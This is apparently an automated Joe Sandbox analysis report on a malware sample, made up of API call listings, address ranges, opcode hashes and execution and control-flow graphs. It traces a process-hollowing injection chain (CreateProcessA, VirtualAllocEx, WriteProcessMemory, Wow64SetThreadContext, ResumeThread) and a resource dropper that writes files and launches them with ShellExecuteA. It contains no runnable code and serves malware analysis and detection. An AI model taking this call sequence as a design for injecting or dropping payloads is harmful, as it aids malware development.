                                                • Opcode ID: 78bff7a08adb2e273cfd56390f71812a56b257a8d92a02d97d158483f68ac0dc
                                                • Instruction ID: 3a483cdeac8656d780dc7e1cfddea30c389e569f99c225e824e2a7291f7b33ec
                                                • Opcode Fuzzy Hash: 78bff7a08adb2e273cfd56390f71812a56b257a8d92a02d97d158483f68ac0dc
                                                • Instruction Fuzzy Hash: B3E13B75E00219DFCB14CFA9C884AADBBB6BF88321F158169E845EB361D734DE41EB50

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CED6-00F3D225
• API block: 00F3D06F-00F3D129 calls CreateProcessA
• Internal calls: 00F3012C from blocks 00F3D1C0, 00F3D1D4 and 00F3D1E8
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F3D116
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: c085ee96b8477cf399e6526faad15444d1ca24d07ef81c26a8b65cd0ab00700c
                                                • Instruction ID: 8e9cb7d5106137aa1e913a36e07baa343901b7a75e486103f3c2932f51f3d39e
                                                • Opcode Fuzzy Hash: c085ee96b8477cf399e6526faad15444d1ca24d07ef81c26a8b65cd0ab00700c
                                                • Instruction Fuzzy Hash: 81A16B71D00319CFEB24DFA8D8417EEBBB2BF48324F148169E808A7240DB759985DF91

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CEE0-00F3D225 (same body as the preceding entry, entered later)
• API block: 00F3D06F-00F3D129 calls CreateProcessA
• Internal calls: 00F3012C from blocks 00F3D1C0, 00F3D1D4 and 00F3D1E8
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00F3D116
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4ec7feb436362abe71e249b60d670e2b32e61c7d79d3ad0c3f6e68464cd27317
                                                • Instruction ID: 97d5df8109df8226aa1d14e3ec95815974c41b73ad1d4d3b59fe6f3e04c7849f
                                                • Opcode Fuzzy Hash: 4ec7feb436362abe71e249b60d670e2b32e61c7d79d3ad0c3f6e68464cd27317
                                                • Instruction Fuzzy Hash: 71915A71D00719CFEB24DFA9D841BEEBBB2BF48324F148169E808A7244DB749985DF91

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F30C10-00F30DA2
• API block: 00F30D03-00F30D4F calls LoadLibraryA
• Internal calls: 00F30560 from the entry block 00F30C10-00F30C29, 00F3012C from block 00F30D99
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 00F30D3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5969b79a50305d3b7e65660cdca0109368443feedc614d5ecb5e0722837fd649
                                                • Instruction ID: 7b1af479b61edbd36414f845f7d266adf48ee24f6c02a6b924884c20660cc452
                                                • Opcode Fuzzy Hash: 5969b79a50305d3b7e65660cdca0109368443feedc614d5ecb5e0722837fd649
                                                • Instruction Fuzzy Hash: A541AC74D047888FDB11CFA9C8A179EBFF1AF49320F14816AD804EB391DBB89845DB51

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F30C50-00F30DA2 (same body as the preceding entry, entered later)
• API block: 00F30D03-00F30D4F calls LoadLibraryA
• Internal calls: 00F3012C from block 00F30D99
                                                APIs
                                                • LoadLibraryA.KERNELBASE(?), ref: 00F30D3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6093cb34685d35b47fe3959bbd574cf2552bfc28e69d50ee9bee39db0a54c3f7
                                                • Instruction ID: e91a487313b23265b36bc1886ec94f2410fb487342902e1e30813adc4fc6fd22
                                                • Opcode Fuzzy Hash: 6093cb34685d35b47fe3959bbd574cf2552bfc28e69d50ee9bee39db0a54c3f7
                                                • Instruction Fuzzy Hash: E84127B1D006589FDB14CFA9C89579DBBF1FF48320F14812AE818AB394DBB4A841CB91

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CC50-00F3CD2E (exit path to 00F3CC3F-00F3CC41)
• API block: 00F3CCB6-00F3CCF5 calls WriteProcessMemory
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F3CCE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 5078c73a052fa41b112d9a72bfd21702693a3629945dc06de1e0c12f8ee94b69
                                                • Instruction ID: 72fe5ddbafc7a8ce9649b98f3c176f98b91fe09c8009c4f0ac256ce671276116
                                                • Opcode Fuzzy Hash: 5078c73a052fa41b112d9a72bfd21702693a3629945dc06de1e0c12f8ee94b69
                                                • Instruction Fuzzy Hash: B42139B6D003599FDB00CFA9C885BDEBBF5FF48320F10842AE919A7240D7799955DBA0

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CB6A-00F3CC41
• API block: 00F3CBB1-00F3CC13 calls VirtualAllocEx
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F3CC06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 69821fce8bade6d135ecedcd2442f09b696ba9d47981305c2bff1e24c9fa3aec
                                                • Instruction ID: af7c2629f017bc84ff3edb71b4f6cad8c7794acf911bcfb3ddcc0b2885661149
                                                • Opcode Fuzzy Hash: 69821fce8bade6d135ecedcd2442f09b696ba9d47981305c2bff1e24c9fa3aec
                                                • Instruction Fuzzy Hash: E021F172C083898FDB11CFA9C4457DEBFF1EF4A324F18849AD095AB252C7398505CB91

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3C6B0-00F3C77C (exit path to 00F3C69F-00F3C6A5)
• API block: 00F3C713-00F3C743 calls Wow64SetThreadContext
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00F3C736
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: a966a83f5b324e0c131daea0de8fd8827133e870ad38729b2a9526bac76f79bb
                                                • Instruction ID: 3ddcde5f5b6278673549b7aa9b2eabf121c3f1db847baa31e63ce977648d32cb
                                                • Opcode Fuzzy Hash: a966a83f5b324e0c131daea0de8fd8827133e870ad38729b2a9526bac76f79bb
                                                • Instruction Fuzzy Hash: B4215972D002098FDB10DFAAC8857EEBBF4EF88324F14842AD518B7640D7789A45CFA0

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3C8D0-00F3E3CC
• API block: 00F3E36E-00F3E39B calls SetKernelObjectSecurity
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: 92226dfcd45988dd5cf58d5a4c63ba5603cf219b4959592b30f5b0449e3b5bc9
                                                • Instruction ID: 25211397e6c5134ab83facbdbbc743b7400bec117dffa1bde3e1ff418f9f6413
                                                • Opcode Fuzzy Hash: 92226dfcd45988dd5cf58d5a4c63ba5603cf219b4959592b30f5b0449e3b5bc9
                                                • Instruction Fuzzy Hash: B9214A71900209CFDB10CFAAC484BDEBBF4EF48320F14842AD458A7281D774A944CFA5

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CC58-00F3CD2E (same body as the WriteProcessMemory entry above, entered later)
• API block: 00F3CCB6-00F3CCF5 calls WriteProcessMemory
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00F3CCE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: da6943bbb336d86823d17ac80627d5e9b5bd85589b6948aa08464a1b942b387b
                                                • Instruction ID: 1b3f004a18bd7724cf1518b9690b40ee925832936708b312aca226f9f09081de
                                                • Opcode Fuzzy Hash: da6943bbb336d86823d17ac80627d5e9b5bd85589b6948aa08464a1b942b387b
                                                • Instruction Fuzzy Hash: 3E2125B1D003599FDB10CFAAC885BDEBBF5FF48320F10842AE919A7240D7789954DBA0

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3C8DC-00F3E3CC (same body as the SetKernelObjectSecurity entry above, entered later)
• API block: 00F3E36E-00F3E39B calls SetKernelObjectSecurity
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: 141208be1d8dee3633c047daf8c1e029fe9105c0f9a4d69f03bf770fb74d15b8
                                                • Instruction ID: 057069958a0acd04ce0f53b4ac78fda85ed0868fdd46350dfad23c93fe401340
                                                • Opcode Fuzzy Hash: 141208be1d8dee3633c047daf8c1e029fe9105c0f9a4d69f03bf770fb74d15b8
                                                • Instruction Fuzzy Hash: D0211871900249DFDB10DF9AC485BEEBBF4EF48320F148429E519A7381D778A944CFA5

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3C6B8-00F3C77C (same body as the Wow64SetThreadContext entry above, entered later)
• API block: 00F3C713-00F3C743 calls Wow64SetThreadContext
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00F3C736
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 2cc41217da41d0edbcc77304bc78ac6cfcaf072064c870a12ee29f574b9f5baa
                                                • Instruction ID: 20e44332895e98268b93c80cfe0e8dc6565664df5db8f11da31da91e04b49591
                                                • Opcode Fuzzy Hash: 2cc41217da41d0edbcc77304bc78ac6cfcaf072064c870a12ee29f574b9f5baa
                                                • Instruction Fuzzy Hash: 85211575D003098FDB10DFAAC4857EEBBF4EF48320F54842AD959A7241D7789945CFA1

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3E308-00F3E3CC (tail of the SetKernelObjectSecurity function above)
• API block: 00F3E36E-00F3E39B calls SetKernelObjectSecurity
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: baa1ed0c53ec7fc1af73293443cae01de4a03ad1d097a04876997fcb04e841ee
                                                • Instruction ID: 3c8bab530e01f3b4f22405ce97ef0f6f8e0a14d4ce67049b7065f57ec5d3ce92
                                                • Opcode Fuzzy Hash: baa1ed0c53ec7fc1af73293443cae01de4a03ad1d097a04876997fcb04e841ee
                                                • Instruction Fuzzy Hash: 162137B19002098FDB14CFA9C4857DEBBF1EF48320F248429D519A7280D7789945CFA1

Control-flow Graph (rendered image; node and edge list dropped)
• Function: 00F3CB2C-00F3FF5D
• API block: 00F3CB2C-00F3FF33 calls VirtualProtectEx
                                                APIs
                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,00000050,?,?,?,?,00F3F190,?,00000040,00000032), ref: 00F3FF26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 249dded46c02146fce3b71c261a633ecdf8345947d64aec838b0b77d86184b3a
                                                • Instruction ID: 82a3959216ca2f4351791cbe7fb9400e939046b13fcf48e7a25cd4fb6054030a
                                                • Opcode Fuzzy Hash: 249dded46c02146fce3b71c261a633ecdf8345947d64aec838b0b77d86184b3a
                                                • Instruction Fuzzy Hash: F321F776D04249DFDB10DF9AC844BDEBBF5EB49320F10842AE918A7251D374A944DFA1
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F3ED9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: d2e4009c87cc3cec1c74c088eb7a75253e121fdd75690450ac1547df66a7ca97
                                                • Instruction ID: 28e5b54377da457d98fcffe98ef4f238473d6ec09837fb817bd0c53640fdaaaf
                                                • Opcode Fuzzy Hash: d2e4009c87cc3cec1c74c088eb7a75253e121fdd75690450ac1547df66a7ca97
                                                • Instruction Fuzzy Hash: FF2106B6D002599FDB10DF9AC885BDEFBF4EF48320F108429E958A7251D3789A45CFA1
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F3ED9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 8cd5111d29e6de6ea049d49d0519529853e04a0b6abe6e9429e27451d9c6b1ec
                                                • Instruction ID: 3f8a7a1d36117a737ad08469199f37b4cc6f1c8534637723c64d0a9ee41e67ec
                                                • Opcode Fuzzy Hash: 8cd5111d29e6de6ea049d49d0519529853e04a0b6abe6e9429e27451d9c6b1ec
                                                • Instruction Fuzzy Hash: 31210675900249DFDB10DF9AC884BDEFBF4EF48320F108429E958A7251D378A944CFA1
                                                APIs
                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,00000050,?,?,?,?,00F3F190,?,00000040,00000032), ref: 00F3FF26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 20a5a7570363f57b08f482edc8a26417dfc3f9c5b01c6eb4f072696d3aa5f3d8
                                                • Instruction ID: e4d7a5f315bb97926b06036ae5dfb0a5a71bdb2495657e11782165f5ac0725a4
                                                • Opcode Fuzzy Hash: 20a5a7570363f57b08f482edc8a26417dfc3f9c5b01c6eb4f072696d3aa5f3d8
                                                • Instruction Fuzzy Hash: 00213676D00249DFDB10CF9AC580BDEBBF5FB48320F10842AE958A7251D3789545CFA1
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F3CC06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4a28a7963c9dd77643dd8ce76b790c22ab44ff9145b38e77f7772f6d3673890c
                                                • Instruction ID: d1824d8d2fcb0a83afc6b0ed04043e2c8a45bb4b484aaf133052a86ca6c2cac6
                                                • Opcode Fuzzy Hash: 4a28a7963c9dd77643dd8ce76b790c22ab44ff9145b38e77f7772f6d3673890c
                                                • Instruction Fuzzy Hash: F01134729003499FDB10DFAAC845BDEBBF5EF48320F14842AE519A7250C779A950CFA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: daba00cc926f597d8beb056d4dee00ab8bda1c113702bb2f118fd66e4f102228
                                                • Instruction ID: 82b52ce1d55352f2a0ff75933320ffe7702233ccc295253c2f2a69b78fbddd73
                                                • Opcode Fuzzy Hash: daba00cc926f597d8beb056d4dee00ab8bda1c113702bb2f118fd66e4f102228
                                                • Instruction Fuzzy Hash: BB1158B1D003088FDB10DFAAC4457DEFBF4EB48320F248829C519A7240C7799A41CF94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2342c42d30ede4e9bdd97a11f2a7ace1bd4604bee77bc5eea8469db9c17a508c
                                                • Instruction ID: 177f27d57a7dfd19162d33554f0c47697d65ee7003484480d23ea4131a3ce7a9
                                                • Opcode Fuzzy Hash: 2342c42d30ede4e9bdd97a11f2a7ace1bd4604bee77bc5eea8469db9c17a508c
                                                • Instruction Fuzzy Hash: EC1125B1D003498BDB10DFAAC4457DEFBF5AB88320F24842AD559A7240C779A944CFA5
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00F3EEC7), ref: 00F3FD9F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 5377a3f8f832a89afeb91a9f9e677fd1e887045705d90644581370e5fe77ec6a
                                                • Instruction ID: bed0f2a5c1a0fe74927d72bcf1c9a8d829f76704b05cc36543e3f5883c441dc7
                                                • Opcode Fuzzy Hash: 5377a3f8f832a89afeb91a9f9e677fd1e887045705d90644581370e5fe77ec6a
                                                • Instruction Fuzzy Hash: 241102B5D002599BDB00DF9AD844BDEFBB4FB49324F10816AD818A7240D378A905CFA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d5b5bcc1c2aa239a354aa763d88e0515882c07394c6c93a3b35b32f483e6ea9
                                                • Instruction ID: d5a04753635935faf6a3e195f6c9572f074c9d4ae03cd8acac0fbab0b79ed7c2
                                                • Opcode Fuzzy Hash: 0d5b5bcc1c2aa239a354aa763d88e0515882c07394c6c93a3b35b32f483e6ea9
                                                • Instruction Fuzzy Hash: 5BD1D371E012298FDB64CF69CC80BEDB7B2BF88314F1481EAD509A7255EB309E859F50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5d4ff20e1dec9aae9d44d089a350a8cdf8f4d1272d8ab553d169bda7db36f73
                                                • Instruction ID: 970cf8b863a18cc62c14512808cbaa1d38d437c5c9e531e212cfac0ae30a2575
                                                • Opcode Fuzzy Hash: d5d4ff20e1dec9aae9d44d089a350a8cdf8f4d1272d8ab553d169bda7db36f73
                                                • Instruction Fuzzy Hash: 88B1B271E012298FDB64CF69CD80BEDB7B2BF88314F1481E6D509A7255EB309E859F50

                                                Execution Graph

                                                Execution Coverage:64%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:59.3%
                                                Total number of Nodes:81
                                                Total number of Limit Nodes:10
                                                execution_graph 161 401ae1 GetCommandLineA GetModuleHandleA GetProcessHeap 164 401000 6 API calls 161->164 165 4010cc GetMessageA 164->165 166 4010e0 TranslateMessage DispatchMessageA 165->166 167 4010f4 ExitProcess 165->167 166->165 255 4018a8 lstrcpyA lstrcatA lstrcatA lstrcatA lstrcatA 256 401906 255->256 168 4010fb 169 401111 168->169 170 40110a 168->170 171 401117 169->171 172 40112f 169->172 179 40135a GetSystemDirectoryA PathAddBackslashA GetWindowsDirectoryA 170->179 223 4011cf 14 API calls 171->223 175 401142 DefWindowProcA 172->175 176 401135 PostQuitMessage 172->176 178 40111c SendMessageA 178->175 180 401395 GetTempPathA 179->180 181 4013af GetModuleFileNameA 180->181 182 4013cb GetEnvironmentVariableA 181->182 183 4013ed 182->183 224 401907 FindResourceA 183->224 185 40142a 186 401438 185->186 238 4011c4 185->238 235 401abe 186->235 190 401445 FindResourceA 191 401455 190->191 192 40145a SizeofResource 190->192 194 401887 191->194 195 40188e 191->195 192->191 193 401470 LoadResource 192->193 193->191 196 40148b LockResource 193->196 247 401157 lstrcpyA lstrcatA lstrcatA 194->247 199 401897 ExitProcess 195->199 200 40189c ExitProcess 195->200 196->191 198 40149f GlobalAlloc 196->198 198->191 202 4014ba RtlMoveMemory 198->202 203 4018a3 200->203 212 40150c 202->212 204 4014f9 GlobalAlloc 204->191 204->212 205 401515 RtlMoveMemory 206 401549 GlobalFree lstrcpynA 205->206 207 40159e lstrcpyA lstrlenA 206->207 206->212 207->212 208 4015c1 lstrcpyA lstrlenA 208->212 209 40163f lstrcpyA 210 40165f lstrcatA 209->210 211 401692 CreateFileA WriteFile 210->211 215 401677 210->215 214 4017cd CloseHandle GlobalFree SetFileAttributesA 211->214 211->215 212->204 212->205 212->206 212->208 212->209 213 401683 lstrcpyA 213->211 214->215 215->211 215->213 215->214 217 401866 FreeResource 215->217 218 401701 HeapAlloc WriteFile HeapFree 215->218 219 40174f CreateFileA GetFileSize CloseHandle 215->219 221 401824 lstrcpyA PathFindFileNameA 215->221 222 401854 ShellExecuteA 215->222 243 4012f7 215->243 217->190 217->191 218->214 219->214 220 40178d HeapAlloc WriteFile HeapFree 219->220 220->214 221->215 222->217 223->178 225 401925 SizeofResource 224->225 227 401920 224->227 225->227 228 40193b LoadResource 225->228 226 401b16 ExitProcess 227->226 228->227 229 401956 LockResource 228->229 229->227 230 40196a RtlMoveMemory 229->230 231 401993 230->231 232 4019a6 HeapAlloc RtlMoveMemory HeapAlloc RtlMoveMemory 231->232 233 401a09 GlobalAlloc RtlMoveMemory FreeResource 231->233 232->233 233->185 233->226 236 40143d 235->236 237 401ac7 MessageBoxA 235->237 236->190 237->236 249 40119d GetPEB 238->249 240 4011c9 252 4011af GetPEB 240->252 242 4011ce 242->186 244 401320 243->244 245 40132c lstrlenA 244->245 246 40134d 245->246 246->215 248 40119c 247->248 248->200 250 4011a9 249->250 250->240 251 401b16 ExitProcess 250->251 253 4011be 252->253 253->242 254 401b16 ExitProcess 253->254

                                                Callgraph

                                                Control-flow Graph

                                                control_flow_graph 0 40135a-401431 GetSystemDirectoryA PathAddBackslashA GetWindowsDirectoryA GetTempPathA GetModuleFileNameA GetEnvironmentVariableA call 401907 11 401433 call 4011c4 0->11 12 401438-401443 call 401abe 0->12 11->12 16 401445-401453 FindResourceA 12->16 17 401455 16->17 18 40145a-401469 SizeofResource 16->18 19 40187e-401885 17->19 20 401470-401484 LoadResource 18->20 21 40146b 18->21 22 401887-40188c call 401157 19->22 23 40188e-401895 19->23 24 401486 20->24 25 40148b-401498 LockResource 20->25 21->19 30 40189c-40189e ExitProcess 22->30 29 401897 ExitProcess 23->29 23->30 24->19 27 40149a 25->27 28 40149f-4014b3 GlobalAlloc 25->28 27->19 32 4014b5 28->32 33 4014ba-401505 RtlMoveMemory call 401a90 GlobalAlloc 28->33 34 4018a3 30->34 32->19 37 401507 33->37 38 40150c-401513 33->38 37->19 39 401515-401526 RtlMoveMemory 38->39 40 401528-401541 38->40 41 401549-40159c GlobalFree lstrcpynA 39->41 40->41 42 4015b4-4015bf 41->42 43 40159e-4015b1 lstrcpyA lstrlenA 41->43 44 4015c1-4015d4 lstrcpyA lstrlenA 42->44 45 4015d7-4015dc 42->45 43->42 44->45 46 4015e6-4015e9 45->46 47 4015de-4015e4 45->47 49 4015f3-4015f6 46->49 50 4015eb-4015f1 46->50 48 40163f-401675 lstrcpyA lstrcatA 47->48 58 401692-4016d2 CreateFileA WriteFile 48->58 59 401677-401681 48->59 51 401600-401603 49->51 52 4015f8-4015fe 49->52 50->48 54 401605-40160b 51->54 55 40160d-401610 51->55 52->48 54->48 56 401612-401618 55->56 57 40161a-40161d 55->57 56->48 60 401627-40162a 57->60 61 40161f-401625 57->61 63 4016d8-4016e2 58->63 64 4017cd-4017f1 CloseHandle GlobalFree SetFileAttributesA 58->64 59->58 62 401683-40168d lstrcpyA 59->62 65 401634-401637 60->65 66 40162c-401632 60->66 61->48 62->58 63->64 69 4016e8-4016ef 63->69 67 4017f3-4017f8 call 4012f7 64->67 68 4017fd-401802 64->68 65->48 72 401639 65->72 66->48 67->68 74 401804-40180a 68->74 75 401866-401878 FreeResource 68->75 70 4016f1-4016fb 69->70 71 401746-40174d 69->71 70->64 76 401701-401741 HeapAlloc WriteFile HeapFree 70->76 71->64 77 40174f-40178b CreateFileA GetFileSize CloseHandle 71->77 72->48 78 401810-401813 74->78 79 40180c-40180e 74->79 75->16 75->19 76->64 77->64 80 40178d-4017c8 HeapAlloc WriteFile HeapFree 77->80 82 401815-401817 78->82 83 401819-40181c 78->83 81 401824-401849 lstrcpyA PathFindFileNameA 79->81 80->64 84 401852 81->84 85 40184b-401850 81->85 82->81 86 401822 83->86 87 40181e-401820 83->87 88 401854-401860 ShellExecuteA 84->88 85->88 86->81 87->81 88->75
